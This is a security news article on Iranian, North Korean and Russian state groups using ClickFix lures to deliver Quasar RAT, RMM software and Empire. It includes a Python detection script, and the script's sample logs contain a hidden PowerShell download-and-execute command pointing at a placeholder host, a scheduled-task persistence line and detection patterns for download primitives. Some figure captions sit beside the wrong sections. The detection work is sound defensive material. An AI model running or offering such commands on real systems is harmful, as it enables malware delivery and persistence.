
Multiple state-sponsored hacking groups from Iran, North Korea and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware over a three-month period spanning late 2024 and early 2025.
The phishing campaigns employing the tactic are attributed to clusters tracked as TA427 (aka Kimsuky), TA450 (aka MuddyWater), UNK_RemoteRogue, and TA422 (aka APT28).
Although ClickFix started out as an initial access technique associated primarily with cybercrime groups, its effectiveness has led to its adoption by nation-state groups as well.
“The incorporation of ClickFix is replacing the installation and execution stages of existing infection chains rather than revolutionizing the campaigns carried out by TA427, TA450, UNK_RemoteRogue and TA422.”
ClickFix, in a nutshell, refers to a deceptive technique that tricks users into infecting their own machines by following a set of instructions to copy, paste and execute malicious commands under the pretext of fixing an issue, completing a CAPTCHA verification, or registering a device.

Proofpoint said it first observed Kimsuky using ClickFix in January and February 2025 as part of a phishing campaign targeting individuals at fewer than five organizations in the think tank sector.
“TA427 first contacted the target through a meeting request from a spoofed sender delivered to a traditional TA427 target working on the North Korean issue,” the Proofpoint Research team said.
TA427 ClickFix infection chain
“After a brief conversation to engage with the target and build trust, as is common in TA427 activities, the attacker pointed the target to an attacker-controlled site and convinced the target to run a PowerShell command.”
The company explained that the attack chain set off a multi-stage sequence culminating in the deployment of an open-source remote access trojan named Quasar RAT.
The email message claimed to come from a Japanese diplomat and asked the recipient to arrange a meeting with the Japanese ambassador. During the conversation, the threat actors sent a malicious PDF containing a link to another document said to hold a list of questions to be discussed during the meeting.
TA450 ClickFix infection chain
Clicking the link directs the victim to a fake landing page that mimics the Japanese Embassy website, where, in order to download the questionnaire, they are asked to copy and paste a command into the Windows Run dialog to "register" the device.
“The ClickFix PowerShell command retrieves and executes a second remotely hosted PowerShell command, which showed the decoy PDF (Questionnaire.pdf) referenced earlier in the chain,” Proofpoint said. “The document claimed to be from the Japanese Ministry of Foreign Affairs and included questions regarding nuclear proliferation and policy in Northeast Asia.”
The second PowerShell script is configured to create a Visual Basic script that is run every 19 minutes by a scheduled task. That script in turn downloads two batch scripts that create, decode and execute the Quasar RAT payload. It is worth pointing out that this variant of the attack chain was previously documented by Microsoft in February 2025.
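The chain above has two stages a defender can look for in endpoint telemetry: a PowerShell process spawned from explorer.exe (the Windows Run dialog and the File Explorer address bar are both children of explorer.exe) with a download-and-execute command line, followed shortly afterwards by a scheduled task that runs a script from a user-writable path on a short minute-based interval. The detection below is an added example written for this article; it is not Proofpoint's tooling or code from the original page. It parses constructed JSON-lines events whose field names are loosely modeled on Sysmon Event ID 1 (process creation); the hostnames, usernames, paths, URLs and command lines in the sample are made up, and the 19-minute interval is taken from the chain described above.

```python
"""Heuristic detection for ClickFix-style execution chains (added example).

Stage 1: PowerShell launched by explorer.exe with a download-and-execute
         command line (what a victim pasting into the Run dialog produces).
Stage 2: schtasks creating a short-interval task that runs a script host or
         script file from a user-writable location on the same host soon after.
"""
import json
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): a ClickFix-like chain on WS01
# and benign administrative activity on WS02. All names and paths are made up.
SAMPLE_EVENTS = r"""
{"ts": "2025-01-21T09:12:10", "host": "WS01", "user": "WS01\\alice", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmd": "powershell -w hidden -c \"iex (iwr http://stage.invalid/s1.ps1 -UseBasicParsing)\""}
{"ts": "2025-01-21T09:12:15", "host": "WS01", "user": "WS01\\alice", "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "schtasks /create /f /sc minute /mo 19 /tn \"SysUpdate\" /tr \"wscript.exe C:\\Users\\Public\\update.vbs\""}
{"ts": "2025-01-21T09:40:02", "host": "WS02", "user": "WS02\\bob", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmd": "powershell -NoProfile -Command Get-ChildItem C:\\Logs"}
{"ts": "2025-01-21T10:01:30", "host": "WS02", "user": "WS02\\bob", "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmd": "schtasks /create /sc daily /st 02:00 /tn Backup /tr \"C:\\Tools\\backup.exe\""}
"""

SHELLS = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download-and-execute primitives; case-insensitive.
DOWNLOAD_EXEC = re.compile(
    r"(?i)\b(iex|invoke-expression|iwr|invoke-webrequest|invoke-restmethod|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b")
USER_WRITABLE = re.compile(r"(?i)\\(users\\public|appdata|temp|programdata)\\")
SCRIPT_HOST = re.compile(r"(?i)(wscript|cscript|mshta|\.vbs|\.js|\.bat|\.cmd|\.ps1)")
MINUTE_TASK = re.compile(r"(?i)/sc\s+minute\b.*?/mo\s+(\d+)")
TASK_ACTION = re.compile(r'(?i)/tr\s+(?:"([^"]*)"|(\S+))')


def parse_events(text):
    """Parse JSON lines into dicts, converting 'ts' to a datetime; skip blanks."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_launch(ev):
    """Stage 1: a shell spawned by explorer.exe with a download-and-execute command.
    explorer.exe as parent alone is too noisy (shortcuts, double-clicks), so the
    command-line indicator is required as well."""
    return (basename(ev["image"]) in SHELLS
            and basename(ev["parent_image"]) == "explorer.exe"
            and DOWNLOAD_EXEC.search(ev["cmd"]) is not None)


def suspicious_task_interval(ev):
    """Stage 2: return the minute interval when schtasks creates a task that fires
    at most hourly and runs a script host/script from a user-writable path, else None."""
    cmd = ev["cmd"]
    if basename(ev["image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return None
    m = MINUTE_TASK.search(cmd)
    if not m or int(m.group(1)) > 60:
        return None
    a = TASK_ACTION.search(cmd)
    action = (a.group(1) or a.group(2)) if a else ""
    if SCRIPT_HOST.search(action) and USER_WRITABLE.search(action):
        return int(m.group(1))
    return None


def detect(text, window=timedelta(minutes=15)):
    """Correlate stage 1 with stage 2 on the same host inside `window`.
    A launch with no follow-up persistence is still reported, at lower severity."""
    events = sorted(parse_events(text), key=lambda e: e["ts"])
    alerts = []
    for launch in (e for e in events if is_clickfix_launch(e)):
        tasks = []
        for e in events:
            if e["host"] == launch["host"] and launch["ts"] <= e["ts"] <= launch["ts"] + window:
                interval = suspicious_task_interval(e)
                if interval is not None:
                    tasks.append((e["cmd"], interval))
        alerts.append({
            "host": launch["host"],
            "user": launch["user"],
            "launch_cmd": launch["cmd"],
            "persistence": tasks,
            "severity": "high" if tasks else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert, indent=2))
```

On the sample data this reports a single high-severity alert for WS01 (launch plus a 19-minute wscript task) and nothing for WS02, whose PowerShell came from cmd.exe and whose task is a daily job outside user-writable paths. The interval cap, path list and download primitives are deliberately conservative starting points; tune them against your own baseline before deploying.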
UNK_RemoteRogue ClickFix infection chain
The second nation-state group to latch onto ClickFix is the Iran-linked MuddyWater, which uses the technique to deploy legitimate remote monitoring and management (RMM) software, such as Level, in order to maintain persistent access.
Phishing emails sent on November 13 and 14, 2024, coinciding with Patch Tuesday, spoofed a security update from the tech giant and asked recipients to follow ClickFix-style instructions to address a vulnerability.
“The attacker deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges and then copy and run the commands contained in the email body,” Proofpoint said.
“This command was responsible for installing remote management and monitoring (RMM) software, in this case Level. The TA450 operator would then exploit the RMM tool to spy on the target machine and remove data from it.”

The TA450 ClickFix campaign is said to target the finance, government, health, education and transportation sectors, with an emphasis on the United Arab Emirates (UAE) and Saudi Arabia, as well as targets in Canada, Germany, Switzerland and the United States.
Also jumping on the ClickFix bandwagon is a suspected Russian group tracked as UNK_RemoteRogue, which late last year sent lure emails from a compromised Zimbra server containing a link to a Microsoft Office document.
Standard campaign and ClickFix sighting timeline (July 2024 – March 2025)
Visiting the link led to a page containing instructions to copy code from the browser into a terminal, along with a YouTube video tutorial showing how to run PowerShell. The PowerShell commands were equipped with the ability to run JavaScript that in turn executed PowerShell code linked to the Empire command-and-control (C2) framework.
Proofpoint said the campaign sent 10 messages to individuals at two organizations associated with leading weapons manufacturers in the defense industry. UNK_RemoteRogue is also known to share infrastructure with another phishing campaign that targeted defense and aerospace entities with links to the ongoing conflict in Ukraine in order to harvest webmail credentials via fake login pages.
“Several examples of state-sponsored actors using ClickFix show not only the popularity of the technique among state actors, but also its use by different countries within weeks of each other,” the company said. “While it is not a permanent technique, it is possible that more threat actors from North Korea, Iran and Russia have also tried and tested ClickFix, or may do so in the near future.”